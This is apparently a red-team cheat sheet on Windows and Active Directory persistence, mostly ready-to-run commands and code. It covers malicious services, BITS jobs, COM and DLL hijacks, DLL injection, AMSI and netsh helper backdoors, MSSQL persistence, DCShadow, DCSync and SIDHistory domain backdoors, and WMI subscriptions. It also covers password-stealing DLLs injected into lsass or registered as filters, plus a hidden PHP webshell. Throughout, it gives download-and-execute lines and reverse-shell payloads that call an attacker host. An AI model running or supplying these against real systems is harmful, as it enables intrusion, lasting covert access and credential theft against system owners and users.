>sc create ms binpath= "cmd /K start C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -c \"IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/xxx.ps1')\"" start= delayed-auto error= ignore
Persist a Cobalt Strike beacon: configure a listener, generate the web-delivery PowerShell one-liner, then
>sc create ms binpath= "cmd /K start C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.0.107:8080/a'))\"" start= delayed-auto error= ignore
With start= delayed-auto the service starts roughly two minutes after boot, so expect the callback then. The binpath is not a real service binary: the SCM gives up on it (error 1053), but cmd /K start has already detached the payload, and error= ignore keeps the failure quiet.
Remove the service
>sc delete ms
PowerShell equivalent
>powershell.exe new-service -Name nuoyani -BinaryPathName "C:\WINDOWS\Temp\360.exe" -StartupType Automatic
Split-string variant to dodge simple command-line signatures
>$c2='new-';$c3='service -Name nuoyani -DisplayName OrderServ -BinaryPathName "C:\accc.exe" -StartupType Automatic'; $Text=$c2+$c3;IEX(-join $Text)

Bitsadmin

Create a download job
>bitsadmin /create empire
Add a file to the job. The "remote" source here is the local cmd.exe (%comspec%), so the job needs no network at all
>bitsadmin /addfile empire %comspec% c:\windows\temp\1.exe
Set the command that runs when the transfer finishes or errors (the DLL was generated with msfvenom and dropped in temp)
>bitsadmin /SetNotifyCmdLine empire cmd.exe "cmd.exe /c rundll32 c:\windows\temp\1.dll,0"
Or fetch and run a scriptlet instead:
>bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://x.com/shell.sct scrobj.dll"
Start the job
>bitsadmin /resume empire
List every user's jobs
>bitsadmin /list /allusers /verbose
The BITS service re-queues unfinished jobs after a reboot, so the callback comes back after a restart.
Finish the job (this also removes it from the queue)
>bitsadmin /complete empire
>bitsadmin /cancel <Job>        delete one job
>bitsadmin /reset /allusers     delete all jobs
Full sequence with the scriptlet variant:
>bitsadmin /create mission
>bitsadmin /addfile mission %comspec% %temp%\cmd.exe
>bitsadmin.exe /SetNotifyCmdLine mission regsvr32.exe "/u /s /i:http://192.168.0.107/shell.sct scrobj.dll"
>bitsadmin /Resume mission

          CLR Injection

Hijacks every .NET program the user starts, so it fires at logon. Batch script: https://github.com/3gstudent/CLR-Injection/blob/master/CLR-Injection_x64.bat
The wmic lines can be replaced by PowerShell:
New-ItemProperty "HKCU:\Environment\" COR_ENABLE_PROFILING -value "1" -propertyType string | Out-Null
New-ItemProperty "HKCU:\Environment\" COR_PROFILER -value "{11111111-1111-1111-1111-111111111111}" -propertyType string | Out-Null
What the batch does:
wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"
wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll delete
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll delete
(the second certutil call with "delete" removes the cached copy certutil keeps under the user's INetCache)
SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%\msg_x64.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F
SET KEY=HKEY_CURRENT_USER\Software\Classes\WoW6432Node\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%\msg.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F
By hand, the same thing is:
1. Add the user environment variables under HKEY_CURRENT_USER\Environment: COR_ENABLE_PROFILING=1 and COR_PROFILER={11111111-1111-1111-1111-111111111111}. The CLR reads both at startup and loads the profiler COM object named by COR_PROFILER into every .NET process.
2. Register the CLSID under HKEY_CURRENT_USER\Software\Classes\CLSID: create the key {11111111-1111-1111-1111-111111111111} with a subkey InprocServer32 whose default value is the DLL path, and add a ThreadingModel value of Apartment. HKCU classes take precedence over HKLM for non-elevated processes, so no admin rights are needed.
Hijacking explorer.exe from the current shell only (SET affects processes started from this cmd, not the user profile):
>SET COR_ENABLE_PROFILING=1
>SET COR_PROFILER={11111111-1111-1111-1111-111111111111}
Location (create it): HKEY_CURRENT_USER\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32, default value = the malicious DLL, plus a ThreadingModel value of Apartment.

          COM OBJECT hijacking

CAccPropServicesClass and MMDeviceEnumerator

No admin rights and no reboot needed. https://github.com/3gstudent/COM-Object-hijacking
The PowerShell script carries the malicious DLL base64-encoded.


Running it drops two files, the x86 and x64 DLLs, into %appdata%\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}, and creates HKEY_CURRENT_USER\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7} with a subkey whose default value points at the malicious DLL. Any process that instantiates the hijacked objects loads the DLL; the notes list iexplore and mmc as triggers.

          Explorer

Registry location: HKCU\Software\Classes\CLSID\
Create the key {42aedc87-2188-41fd-b9a3-0c966feabec1}, then the subkey InprocServer32
Set its Default value to the absolute path of the malicious DLL, e.g. C:\test\1.dll
Add the value ThreadingModel REG_SZ Apartment
Other CLSIDs explorer.exe loads that can be hijacked the same way:
HKCU\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}
HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKCU\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}
HKCU\Software\Classes\Wow6432Node\CLSID\{BCDE0395-E52F-467C-8E3D-C4579291692E}

Squiblydoo

          創建1.sct
Create 1.sct. The registration element needs a progid (Component.TESTCB, the name the trigger script below instantiates) and a classid; the classid is missing from this copy of the notes, so use any freshly generated GUID (uuidgen, or [guid]::NewGuid() in PowerShell):
    <?XML version="1.0"?>
    <scriptlet>
      <registration description="Component" progid="Component.TESTCB" version="1.00" classid="{REPLACE-WITH-A-FRESH-GUID}">
      </registration>
      <public>
        <method name="exec"></method>
      </public>
      <script language="JScript">
        <![CDATA[
          function exec() {
            new ActiveXObject('WScript.Shell').Run('calc.exe');
          }
        ]]>
      </script>
    </scriptlet>
Register the COM object from the remote scriptlet (scrobj.dll fetches and executes it under regsvr32, which is why this needs no admin rights and no file on disk)
>regsvr32.exe /s /i:http://192.168.0.107/1.sct scrobj.dll
Trigger it later from JScript; 1.js:
    var test = new ActiveXObject("Component.TESTCB");
    test.exec();
>cscript 1.js

          DLL劫持

          劫持1

Under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\ExcludeFromKnownDlls add "lpk.dll" (create the value if it does not exist). ExcludeFromKnownDlls removes the DLL from the KnownDLLs protection so it can be loaded from the application directory; a reboot is required.
Finding a hijackable DLL:
1. Start the program.
2. Use Process Explorer to list the DLLs it loaded.
3. From that list, pick the DLLs that are not in the KnownDLLs key (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs).
4. Write a hijacking DLL with the same exports as the DLL chosen in step 3.
5. Drop it in the application directory, restart the application and check that the hijack worked.
Example: explorer.exe loads RarExt.dll from the WinRAR folder at startup. Start the MSF handler, copy the DLL into the-backdoor-factory folder and patch the payload into the original DLL (the IP and port are the kali listener):
>python backdoor.py -f RarExt.dll -s reverse_shell_tcp_inline -P 12138 -H 192.168.0.107
The patched DLL lands in the backdoored folder. Copy it to the target and replace the original (keep a backup of the original). Every time Explorer starts, the session comes back, so it survives reboots.

          劫持2

Tools: https://github.com/coca1ne/DL_Hijacker is replaced here by its actual location https://github.com/coca1ne/DLL_Hijacker, and https://github.com/git20150901/DLLHijack_Detecter.
DLL_Hijacker reads the export table of the DLL to hijack and generates C++ source that forwards every export and jumps to the malicious code; recompile it as the replacement DLL. DLLHijack_Detecter lists the DLLs a program loads that are not in KnownDLLs.

          MSDTC服務劫持

Service name MSDTC, display name Distributed Transaction Coordinator, process msdtc.exe in %windir%\system32. On start the service reads HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI and tries to load oci.dll, searching %windir%\system32 and C:\Windows\System32\wbem\ among other directories. The DLL does not normally exist, so a planted one is loaded. Writing to system32 needs administrator rights.
#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.51 LPORT=4444 -f dll -o /var/www/html/oci.dll
Put oci.dll in c:\windows\system32\ and restart the service, either with net stop/net start msdtc or by killing the process so the SCM restarts it:
>taskkill /f /im msdtc.exe

          Rattler

Automatically finds hijackable DLLs: https://github.com/sensepost/rattler
>Rattler_x64.exe calc.exe 1
It lists the DLLs that can be hijacked. Following the DLL search order, put the malicious DLL in the program's own directory and run the program.


          DLL代理劫持右鍵

Context-menu handlers are registered under HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers; use Autoruns to see which DLLs they load.
Using rarext.dll as the example, build a proxy DLL with https://github.com/rek7/dll-hijacking (edit the path to dumpbin.exe in parse.py first):
>python3 parse.py -d rarext.dll
Rename the original DLL to rarext_.dll, build the generated solution as rarext.dll, put both DLLs in the original folder and reboot. The proxy forwards every export to rarext_.dll, so the WinRAR menu keeps working while the payload runs each time the right-click menu is opened.

          使用AMSI掃描接口維持權限

https://gist.github.com/b4rtik/48ef702603d5e283bc81a05a01fccd40
AMSI is wired into these Windows 10 components: UAC, PowerShell, Windows Script Host (wscript.exe and cscript.exe), JavaScript and VBScript, Office VBA macros.
This example uses nc to pop a reverse shell.
Register the DLL with regsvr32 or add the keys by hand:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{GUID}                  (Default) REG_SZ "provider description"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{GUID}\InprocServer32   (Default) REG_EXPAND_SZ "path to the DLL"; ThreadingModel REG_SZ "Both"
HKLM\SOFTWARE\Microsoft\AMSI\Providers\{GUID}
regsvr32 has to run with administrator rights because the keys live under HKLM.
Once registered, the DLL is loaded into every process that initialises AMSI, and its SampleAmsiProvider::Scan method is called for each buffer submitted for scanning. The provider can watch for a chosen marker string: when PowerShell submits input containing that string, the payload in the DLL fires, so the backdoor is triggered by typing a line into any PowerShell prompt on the host.


          DLL劫持計劃任務

    function Invoke-ScheduledTaskComHandlerUserTask {
        [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
        Param (
            [Parameter(Mandatory = $True)]
            [ValidateNotNullOrEmpty()]
            [String]$Command,
            [Switch]$Force
        )
        # CLSID of the COM handler a built-in scheduled task (UserTask) runs; an HKCU entry shadows the HKLM one
        $ScheduledTaskCommandPath = "HKCU:\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}\InprocServer32"
        if ($Force -or ((Get-ItemProperty -Path $ScheduledTaskCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)) {
            New-Item $ScheduledTaskCommandPath -Force |
                New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null
        } else {
            Write-Verbose "Key already exists, consider using -Force"
            return
        }
        if (Test-Path $ScheduledTaskCommandPath) {
            Write-Verbose "Created registry entries to hijack the UserTask"
        } else {
            Write-Warning "Failed to create registry key, exiting"
            return
        }
    }
Invoke-ScheduledTaskComHandlerUserTask -Command "C:\test\testmsg.dll" -Verbose
The DLL is loaded whenever that task fires, with the user's privileges, and the hijack survives reboots because it lives in the user's registry hive.

          DLL注入

          Powershell

Generate the DLL
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=6666 -f dll -o /var/www/html/x.dll
>use exploit/multi/handler
>set payload windows/x64/meterpreter/reverse_tcp
On the target, with x.dll downloaded to the current directory, inject it into a running process (replace pid with the target process ID):
>Powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.105/powersploit/CodeExecution/Invoke-DllInjection.ps1'); Invoke-DllInjection -ProcessID pid -Dll .\x.dll"

          InjectProc

Generate the DLL
#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12138 -f dll -o /var/www/html/qq.dll
#use exploit/multi/handler
#set payload windows/x64/meterpreter/reverse_tcp
Inject it into an existing process (xx.exe must already be running)
>InjectProc.exe dll_inj qq.dll xx.exe

          通過控制面板加載項維持權限

Compile the following as a DLL; this version only pops a message box as a test.
    #include "pch.h"        // must be the first include when the project uses precompiled headers
    #include <Windows.h>

    // Exported entry point that control.exe calls for a Control Panel applet
    extern "C" __declspec(dllexport) LONG Cplapplet(HWND hwndCpl, UINT msg, LPARAM lParam1, LPARAM lParam2)
    {
        MessageBoxA(NULL, "inject control panel.", "Control Panel", 0);
        return 1;
    }

    BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
    {
        switch (ul_reason_for_call)
        {
        case DLL_PROCESS_ATTACH:
            Cplapplet(NULL, 0, 0, 0);   // also fires on a plain LoadLibrary of the DLL
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
        }
        return TRUE;
    }
Register it under the current user's CPLs key; the DLL is loaded whenever the Control Panel is opened (for example with the control command):
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\CPLs" /v spotless /d "C:\xxx\dll.dll" /f

          通過自定義.net垃圾回收機制進行DLL注入

A low-privileged user can make a .NET application load a custom garbage collector (GC): the COMPLUS_GCName environment variable names a standalone GC DLL and the runtime loads it at startup, so pointing the variable at a malicious DLL gets it loaded. The only requirement is an export named GC_VersionInfo. Standalone GC loading is a CoreCLR feature, so this works for .NET Core / .NET 5+ processes, not for .NET Framework ones. Message-box DLL:
    #include <Windows.h>

    BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
    {
        switch (ul_reason_for_call)
        {
        case DLL_PROCESS_ATTACH:
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
        }
        return TRUE;
    }

    // Layout the runtime expects from a standalone GC
    struct VersionInfo
    {
        UINT32 MajorVersion;
        UINT32 MinorVersion;
        UINT32 BuildVersion;
        const char* Name;
    };

    // First export the runtime calls when COMPLUS_GCName points at this DLL; the payload runs here
    extern "C" __declspec(dllexport) void GC_VersionInfo(VersionInfo* info)
    {
        info->MajorVersion = 0;
        info->MinorVersion = 0;
        info->BuildVersion = 0;
        info->Name = "giao";
        MessageBoxA(NULL, "giao", "giao", 0);
    }
Set COMPLUS_GCName to the DLL and run any .NET Core program; the DLL is loaded before the application's own code. The process will most likely die afterwards because the fake GC does not implement the GC interface, so the payload must detach itself (new thread or new process) if it has to outlive the host.
Shellcode variant: https://github.com/am0nsec/MCGC



          Windows FAX DLL Injection

Rename the malicious DLL to fxsst.dll and drop it in C:\Windows\ to hijack explorer.exe. It works because explorer.exe lives in C:\Windows, and an executable's own directory is searched before System32, where the legitimate fxsst.dll (Fax) sits. Writing to C:\Windows needs administrator rights.

          DSRM+注冊表ACL后門

Allow the DSRM (Directory Services Restore Mode) administrator to log on over the network:
>reg add HKLM\System\CurrentControlSet\Control\Lsa /v DSRMAdminLogonBehavior /t REG_DWORD /d 2
https://github.com/HarmJ0y/DAMP
Effect: any domain user can read the domain controller's local account hashes over the remote registry.
On the DC, from a SYSTEM shell:
>psexec.exe -accepteula -s -i -d cmd.exe
PS> Add-RemoteRegBackdoor -ComputerName <DC name> -Trustee 'S-1-1-0' -Verbose      (S-1-1-0 is Everyone)
From any domain machine, pull the DC's local account hashes, which include the DSRM Administrator:
https://raw.githubusercontent.com/HarmJ0y/DAMP/master/RemoteHashRetrieval.ps1
PS> Get-RemoteLocalAccountHash -ComputerName <DC> -Verbose
Pass-the-hash with the DSRM hash. /domain is the DC's hostname, not the domain, because the DSRM Administrator is a local account of the DC. mimikatz must run as administrator:
>mimikatz "privilege::debug" "sekurlsa::pth /domain:dc /user:Administrator /ntlm:9f1770aebd442b6b624bdfe9cbc720dd" exit

          DCShadow&SID History

http://192.168.0.107/ps/nishang/ActiveDirectory/Set-DCShadowPermissions.ps1
DCShadow modifies AD so that a domain machine registers itself as a domain controller and pushes changes through replication. This script grants the minimum permissions DCShadow needs by editing AD objects. Running the script itself needs DA (Domain Admin) rights; afterwards the chosen user can run mimikatz's dcshadow without being a DA.
Domain controller: dc.zone.com; domain machine: sub2k8.zone.com; ordinary domain user: y
On the DC:
>Set-DCShadowPermissions -FakeDC sub2k8 -Object dc -Username y -Verbose
This registers sub2k8 as the fake DC and gives y the right to modify the computer object dc from sub2k8.
On sub2k8, start one mimikatz session as local SYSTEM and one as zone\y.
SYSTEM window: run the dcshadow server, which stages the change to the object (here, making y a Domain Admin by rewriting its primary group ID; 512 is Domain Admins):
>lsadump::dcshadow /object:y /attribute:primaryGroupID /value:512
zone\y window: push the change
>lsadump::dcshadow /push
Querying the DC now shows y as a member of Domain Admins.
SIDHistory backdoor: record the domain Administrator's SID in y's sidHistory
>Set-DCShadowPermissions -FakeDC sub2k8 -Object y -Username y -Verbose
>lsadump::dcshadow /object:y /attribute:sidhistory /value:S-1-5-21-2346829310-1781191092-2540298887-500
Push:
>lsadump::dcshadow /push
Test: on the DC, mimikatz queries now show the SIDHistory on y. The SID in sidHistory is added to y's token at logon, so y is treated as the domain Administrator even after the group membership is cleaned up.
Removing the SIDHistory:
PS> Get-ADUser -Filter {name -eq "y"} -Properties sidhistory | foreach {Set-ADuser $_ -remove @{sidhistory="S-1-5-21-2346829310-1781191092-2540298887-500"}}
To remove the delegated permissions, rerun the same Set-DCShadowPermissions command with -Remove appended.

          DCSync后門

In Server Manager open Active Directory Users and Computers: View -> Advanced Features, then right-click the domain -> Properties -> Security and grant Everyone Full Control. From anywhere in the domain:
>mimikatz.exe "lsadump::dcsync /domain:zone.com /user:administrator" exit
Or add a single ACE with PowerView (run on the DC); this grants only the replication rights dcsync needs and is far less noisy than giving Everyone Full Control on the domain object:
>Add-DomainObjectAcl -TargetIdentity "DC=ZONE,DC=COM" -PrincipalIdentity <domain user> -Rights DCSync -Verbose
That account can then run mimikatz's dcsync from any domain host to dump credentials.
Remove the ACE:
>Remove-DomainObjectAcl -TargetIdentity "DC=zone,DC=com" -PrincipalIdentity <user> -Rights DCSync -Verbose

          Netsh Helper DLL

https://github.com/outflanknl/NetshHelperBeacon
https://github.com/rtcrowley/Offensive-Netsh-Helper
A netsh helper is a DLL netsh.exe loads every time it starts; the registration lives under HKLM\SOFTWARE\Microsoft\NetSh, so that key is where defenders look for it.

          MSFvenom生成DLL

Generate a DLL-format payload with msfvenom, upload it and register it as a helper:
>netsh add helper C:\Windows\Temp\help.dll

          MSF+web_delivery

The session survives netsh exiting because the helper launches PowerShell as a separate process.
#use exploit/multi/script/web_delivery
>set target 2            #PSH
>set payload windows/x64/meterpreter/reverse_tcp
>set lhost 192.168.0.107
>set lport 12345
In Visual Studio create an empty DLL project and add https://github.com/rtcrowley/Offensive-Netsh-Helper/blob/master/netshlep.cpp as an existing source file. Paste the web_delivery command into the file, add an x64 configuration in the Configuration Manager, set the configuration type to Dynamic Library and build. Copy the DLL to the target and register it:
>netsh add helper helper.dll

          MSF&Shellcode

The session drops when netsh exits, because the shellcode runs inside netsh.exe itself. https://github.com/outflanknl/NetshHelperBeacon
Generate the shellcode in C format:
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12345 -f c -o /var/www/html/1.c
Open the project in Visual Studio. On a 64-bit system set the Configuration Manager to x64 (solution -> right-click -> Properties), otherwise x86.
Paste the MSF shellcode into the marked place and build the solution.
The DLL appears under x64/Release in the project directory. Copy it to the target's system32 and register it:
>netsh add helper C:\Windows\System32\NetshHelperBeacon.dll
It fires every time netsh starts.

          MSSQL后門

All four variants need sysadmin on the instance; the registry writes go through xp_regwrite and run as the SQL Server service account.
Registry Run key:
>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/PowerUpSQL.ps1');Get-SQLPersistRegRun -Verbose -Name update -Command 'c:\windows\temp\update.exe' -Instance 'zone.com\sub2k8'"
Startup stored procedure: runs every time the SQL Server service starts, so the service has to be restarted to trigger it now
http://192.168.0.107/ps/Powershellery/Stable-ish/MSSQL/Invoke-SqlServer-Persist-StartupSp.psm1
>powershell -ep bypass
>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Powershellery/Stable-ish/MSSQL/Invoke-SqlServer-Persist-StartupSp.psm1')
>Invoke-SqlServer-Persist-StartupSp -Verbose -SqlServerInstance "zone.com\sub2k8" -PsCommand "IEX(new-object net.webclient).downloadstring('http://192.168.0.107/xxxx')"      (the remote script can be generated with CS or Empire)
>net stop mssqlserver
>net start mssqlserver
Image File Execution Options hijack (sethc.exe, the sticky-keys binary, is replaced by cmd.exe at the logon screen):
>powershell -nop -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/PowerUpSQL.ps1');Get-SQLPersistRegDebugger -Verbose -FileName sethc.exe -Command 'c:\windows\system32\cmd.exe' -Instance 'zone.com\sub2k8'"
DDL trigger: fires on schema changes in the database
>powershell -exec bypass
>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/Invoke-SqlServer-Persist-TriggerDDL.psm1')
>Invoke-SqlServer-Persist-TriggerDDL -Verbose -SqlServerInstance "zone\sub2k8" -PsCommand "IEX(new-object net.webclient).downloadstring('http://192.168.0.107/xxxx')"      (the remote script can be generated with CS or Empire)
Remove the trigger:
>Invoke-SqlServer-Persist-TriggerDDL -Verbose -SqlServerInstance "zone\sub2k8" -Remove

          NSSM

http://www.nssm.cc/release/nssm-2.24.zip
NSSM wraps an arbitrary executable as a Windows service
>nssm install <service name>
A configuration dialog opens: set Path to powershell.exe and put the stager arguments in Arguments. Start the service:
>nssm start <service name>
The session comes in, and because it is a service it survives reboots. Remove it:
>nssm remove <servicename>

          添加簽名

Copies the Authenticode signature of a legitimately signed file onto a malicious one. The copied signature does not validate, but tools that only check for the presence of a signature are fooled. https://github.com/secretsquirrel/SigThief
>python sigthief.py -i <signed file to steal from> -t <malicious file> -o <output file>
>python sigthief.py -i rarext.dll -t rarextdwa.dll -o 1.dll




          Metsvc

Meterpreter> run metsvc -A
Writes three files into a random directory under C:\Windows\TEMP and installs a service named metsvc that listens on port 31337.
Connect to the backdoor:
Msf> use exploit/multi/handler
Msf> set payload windows/metsvc_bind_tcp
Msf> set rhost 192.168.1.2
Msf> set rport 31337
Msf> run
Remove the service:
Meterpreter> run metsvc -r
The bind service has no authentication: anyone who can reach port 31337 gets the shell.

          Persistence

Meterpreter> run persistence -X -i 10 -r 192.168.1.9 -p 4444
-X   start at system boot
-i   retry the connection every 10 seconds
Connect to the backdoor:
Msf> use exploit/multi/handler
Msf> set payload windows/meterpreter/reverse_tcp
Msf> set lhost 192.168.1.9
Msf> set lport 4444
Msf> run
Both metsvc and persistence are legacy meterpreter scripts; current Metasploit ships the same functionality as exploit/windows/local/persistence and post/windows/manage/persistence_exe.

          HookPasswordChangeNotify

Build with VS2015, with MFC set to "Use MFC in a Static Library", to get HookPasswordChange.dll.
https://github.com/clymb3r/PowerShell/blob/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1
Append to the end of that script:
>Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass
and save it as HookPasswordChangeNotify.ps1. Upload HookPasswordChangeNotify.ps1 and HookPasswordChange.dll and run as administrator:
>PowerShell.exe -ExecutionPolicy Bypass -File HookPasswordChangeNotify.ps1
Changed passwords are written to C:\Windows\Temp\passwords.txt.
Variant: https://gitee.com/RichChigga/PasswordchangeNotify
Upload the same two files and run as administrator:
>PowerShell.exe -ExecutionPolicy Bypass -File HookPasswordChangeNotify.ps1
Create C:\Windows\System32\system.ini with the callback IP on the first line and the port on the second; captured passwords are sent there.
The hook is injected into lsass memory only, so it is gone after a reboot; the password filter DLL below is the persistent form of the same idea.

          NPPSpy記錄密碼

https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy/NPPSPy.c
A network provider DLL: Windows hands every provider the cleartext credentials at logon, and this one writes them to a file. The default location is the root of C:; change it in the source and recompile.
Put the DLL in the system32 folder.
Run the accompanying ps1 script, which adds the registry entries (the provider's own key and an entry in the NetworkProvider order list).
No reboot is needed.

          Password Filter DLL

https://github.com/3gstudent/PasswordFilter
Build the solution in Visual Studio and put the DLL in %windir%\system32\. Add the module name (Win32Project3, without the .dll extension) to Notification Packages under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa. Query first: the value is a REG_MULTI_SZ and reg add replaces the whole list, so the existing entries (scecli and rassfm on a default build) must be repeated or they are lost.
>REG QUERY "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages"
>REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages" /t REG_MULTI_SZ /d "scecli\0rassfm\0Win32Project3" /f
After a reboot every password change passes through the DLL and is logged.
The log file defaults to the root of C:; change it in the source.

          WMIC事件訂閱

Runs the payload every 30 seconds: the filter polls Win32_PerfFormattedData_PerfOS_System, which changes constantly, so the event fires on every poll. Creating subscriptions in root\subscription needs administrator rights.
>wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="select * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
>wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23", CommandLineTemplate="<remote launcher: powershell, regsvr32, mshta, ...>"
>wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\""
The subscription is stored in the WMI repository, so it survives reboots. Remove it:
>Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose
>Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose
>Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose

          WMI-Persistence

https://gitee.com/RichChigga/WMI-Persistence
In Cobalt Strike: Attacks -> Packages -> Payload Generator -> PowerShell (use x64).
Attacks -> Web Drive-by -> Host File: host the generated script; the Local URI can be anything.
Put the resulting URL into the WMI-Persistence script.
>powershell -exec bypass
PS> Import-Module .\WMI-Persistence.ps1
PS> Install-Persistence
PS> Check-WMI
After a reboot the beacon comes back as SYSTEM (allow 4 to 6 minutes).
Custom payload: host an exe with Web Drive-by -> Host File (any Local URI) and put wmi.xsl in the web root. wmi.xsl:
    <?xml version='1.0'?>
    <stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
      <output method="text"/>
      <ms:script implements-prefix="user" language="JScript">
        <![CDATA[
          var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c certutil -urlcache -split -f http://192.168.0.107/load.jpg %temp%/load.exe & %temp%/load.exe & certutil.exe -urlcache -split -f http://192.168.0.107/load.jpg delete", 0);
        ]]>
      </ms:script>
    </stylesheet>
In the WMI-Persistence script change the payload line so that wmic loads the stylesheet; wmic accepts a URL for /FORMAT and executes the embedded script, which is what runs the payload:
$finalPayload = "wmic os get /FORMAT:`"$Payload`""
>powershell -exec bypass
PS> Import-Module .\WMI-Persistence.ps1
PS> Install-Persistence
PS> Check-WMI
PS> Remove-Persistence      removes the subscription
After a reboot the payload runs.

          Invoke-Tasksbackdoor

Creates a scheduled task that calls back on an interval (-time), either with an nc-style reverse shell (nccat) or a Metasploit payload (msf):
>powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.103/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor -method nccat -ip 192.168.0.103 -port 9999 -time 2"
>powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.103/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor -method msf -ip 192.168.0.103 -port 8081 -time 2"

          Invoke-ADSBackdoor

Hides the payload in an NTFS alternate data stream and creates a scheduled task that fetches the attacker's script every minute.
>powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Backdoors/Invoke-ADSBackdoor.ps1'); Invoke-ADSBackdoor -PayloadURL http://192.168.0.107/ps/Schtasks-Backdoor.ps1 -Arguments 'Invoke-Tasksbackdoor -method nccat -ip 192.168.0.107 -port 12138 -time 1'"




Generating a Metasploit payload for the callback and starting the handler:
>msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.107 LPORT=12138 -f powershell -o /var/www/html/ads
#use exploit/multi/handler
#set payload windows/x64/meterpreter/reverse_https
#run

          ADS隱藏webshell

Attach the shell to a host file (index.php is a legitimate page of the site):
>echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg
Loader that includes the stream:
<?php include('index.php:hidden.jpg') ?>
